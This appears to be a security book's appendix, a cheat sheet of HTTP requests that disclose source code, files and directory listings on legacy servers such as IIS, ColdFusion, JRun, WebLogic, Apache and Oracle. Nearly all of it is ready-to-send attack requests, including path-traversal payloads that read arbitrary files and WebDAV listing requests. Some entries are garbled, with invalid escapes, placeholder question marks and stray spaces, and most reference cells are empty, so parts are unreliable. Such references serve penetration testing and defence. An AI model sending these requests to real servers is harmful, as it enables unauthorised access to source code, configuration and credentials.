This appendix contains a list of all the major source code disclosure techniques discovered over the years. Many of them are specific to particular bugs in particular versions of software. Others are generic across platforms and have been known to reappear contrary to what the vendors say.
Source Code, File, and Directory Disclosure Cheat Sheet |
||
|
Vulnerable Application |
HTTP Request |
Vulnerability Information |
|
Allaire ColdFusion |
GET /CFDOCS/snippets/viewexample.cfm?viewexample.cfm Tagname=<relative path to CFM file> HTTP/1.0 |
|
|
Allaire JRun Alternative Data Stream |
GET /file.jsp::$DATA HTTP/1.0 |
|
|
Allaire JRun Server Side Include |
GET /file HTTP/1.0 Content Length: <length of filename + 28> <!—#include virtual="<filename>"—> |
|
|
Apache Tomcat %70 |
1. GET /file.js%70 HTTP/1.0 2. GET /file%252ejsp HTTP/1.0 |
|
|
BEA WebLogic Case Sensitive File Extension |
1. GET /file.JSP HTTP/1.0 2. GET /file.jsP HTTP/1.0 3. GET /file.Jsp HTTP/1.0 |
|
|
BEA WebLogic 5.1 %70 |
GET /file.js%70 HTTP/1.0 |
|
|
BEA WebLogic FileServlet |
GET /ConsoleHelp/file.jsp HTTP/1.0 |
|
|
BEA WebLogic /file/ |
GET /file/file.jsp HTTP/1.0 |
|
|
BEA WebLogic /*.shtml/ |
GET /*.shtml/file.jsp HTTP/1.0 |
|
|
IBM WebSphere Case Sensitive File Extension |
1. GET /file.JSP HTTP/1.0 2. GET /file.jsP HTTP/1.0 3. GET /file.Jsp HTTP/1.0 |
|
|
IBM WebSphere /servlet/file/ |
GET /servlet/file/file.jsp HTTP/1.0 |
|
|
Microsoft IIS 4.0 + FAT Filesystem |
GET /file.%E2%73%70 HTTP/1.0 |
|
|
Microsoft IIS 4.0 Alternative Data Stream |
GET /file::$DATA HTTP/1.0 |
|
|
Microsoft IIS +.htr |
GET /file.asp+.htr HTTP/1.0 |
|
|
Microsoft IIS Translate: f |
GET /file.asp HTTP/1.0 Translate: f |
|
|
Microsoft IIS 3.0 %2e |
GET /file%2easp HTTP/1.0 |
|
|
Microsoft IIS 2.0/3.0 Append "." |
1. GET /file.asp. HTTP/1.0 2. GET /file.pl HTTP/1.0 3. GET /file.asp%2e HTTP/1.0 4. GET /file.pl%2e HTTP/1.0 |
|
|
Oracle /_pages/ |
GET /_pages/ HTTP/1.0 |
|
|
Sun Java Web Server .jhtml |
1. GET /file.jhtml. HTTP/1.0 2. GET /file.jhtml\HTTP/1.0 |
|
|
File Disclosure Vulnerable Application |
HTTP Request |
Vulnerability Information |
|
Allaire ColdFusion Server exprcalc.cfm |
GET /cfdocs/expeval/ExprCalc.cfm?OpenFile Path=c:\file HTTP/1.0 |
|
|
Allaire ColdFusion openfile.cfm |
GET /cfdocs/expeval/openfile.cfm ?????????? HTTP/1.0 |
|
|
Allaire ColdFusion sourcewindow.cfm |
GET /cfdocs/exampleapp/docs/sourcewindow.cfm?Template=../../file HTTP/1.0 |
|
|
Allaire JRun /servlet/ |
1. GET /servlet/ssiservlet/../../file HTTP/1.0 2. GET /servlet/com.livesoftware.jrun plugins.ssi.SSIFilter/../../file HTTP/1.0 |
|
|
Apache Web Server + PHP.EXE for Win32 |
GET /php/php.exe?c:\file HTTP/1.0 |
|
|
Apache Web Server + PHP3 |
GET /file.php3.%5c../..%5c<relative path to file> HTTP/1.0 |
|
|
Microsoft IIS Unicode |
1. GET /scripts/..%c1%1c../<relative path to file> HTTP/1.0 2. GET /scripts/..%c0%9v../< relative path to file> HTTP/1.0 3. GET /scripts/..%c0%af../< relative path to file> HTTP/1.0 |
|
|
Microsoft IIS Double Decode |
GET /scripts/..%255c..%255c<relative path to file> HTTP/1.0 |
|
|
Microsoft IIS %20.htr |
GET /file%20("%20" repeated 230 times).htr HTTP/1.0 |
|
|
Microsoft IIS idq.dll |
GET /query.idq?CiTemplate=<relative path to file> HTTP/1.0 |
|
|
Microsoft IIS showcode.asp |
GET /msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/<relative path to file> HTTP/1.0 |
|
|
Microsoft IIS codebrws.asp |
GET /iissamples/exair/howitworks/ codebrws.asp?source=<relative path to file> HTTP/1.0 |
|
|
Microsoft IIS viewcode.asp |
1. GET /Sites/Knowledge/Membership/ Inspired/ViewCode.asp?source=<relative path to file> HTTP/1.0 2. GET /Sites/Knowledge/Membership/ Inspiredtutorial/ViewCode.asp?source=<relative path to file> HTTP/1.0 |
http://support.microsoft.com/directory/article.asp?ID=KB;EN-US;Q231656&; |
|
|
3. GET /Sites/Samples/Knowledge/ Membership/Inspired/ViewCode.asp? source=<relative path to file> HTTP/1.0 |
|
|
Netscape Enterprise Server %20 |
GET /file%20 HTTP/1.0 |
|
|
Netscape Enterprise Server /publisher |
GET /publisher HTTP/1.0 |
|
|
Netscape Enterprise Server Win32 8.3 filename |
Normal Request: GET /directory/ HTTP/1.0 Exploitative Request: GET /direct~1/ HTTP/1.0 |
|
|
Directory Disclosure Vulnerable Application |
HTTP Request |
Vulnerability Information |
|
Allaire JRun //WEB-INF/ |
GET //WEB-INF/ HTTP/1.0 |
|
|
Allaire JRun %3f |
GET /%3f.jsp HTTP/1.0 |
|
|
Apache Web Server + Mac OS X .DS_Store |
1. GET /.DS_Store HTTP/1.0 2. GET /.FBCIndex HTTP/1.0 |
|
|
Apache Web Server Multiview |
1. GET /?M=A HTTP/1.0 2. GET /?S=D HTTP/1.0 |
|
|
Apache Web Server Long Slash |
GET <1 to 4096 '/' characters> HTTP/1.0 |
|
|
Apache Web Server/cgi-bin/test-cgi |
1. GET /cgi-bin/test-cgi?/* HTTP/1.0 2. GET /cgi-bin/test-cgi?* HTTP/1.0 |
|
|
BEA WebLogic /%00/ |
1. GET /%00/ HTTP/1.0 2. GET /%2e/ HTTP/1.0 3. GET /%2f/ HTTP/1.0 4. GET /%5c/ HTTP/1.0 |
|
|
Microsoft IIS 5.0 WebDAV |
SEARCH / HTTP/1.1 Host: <hostname or ip address> Content-Type: text/xml Content-Length: 133 <?xml version="1.0"?> <g:searchrequest xmlns:g="DAV:"> <g:sql> Select "DAV:displayname" from scope() </g:sql> </g:searchrequest> |
|
|
Microsoft IIS 3.0/4.0 BDIR.HTR |
GET /scripts/iisadmin/bdir.htr??c:\HTTP/1.0 |
|
|
Netscape Enterprise Server INDEX |
INDEX / HTTP/1.0 |
|
|
Netscape Enterprise Server /?wp-cs-dump |
1. GET /?wp-cs-dump HTTP/1.0 2. GET /?wp-ver-info HTTP/1.0 3. GET /?wp-html-rend HTTP/1.0 |
|
|
Oracle Internet Application Server /WebDB/admin_/ |
GET /WebDB/admin_/ HTTP/1.0 |
|
|
Oracle 9i Application Server mod_plsql |
GET /pls/sample/admin_/help/..%255 c<relative path to file> HTTP/1.0 |
|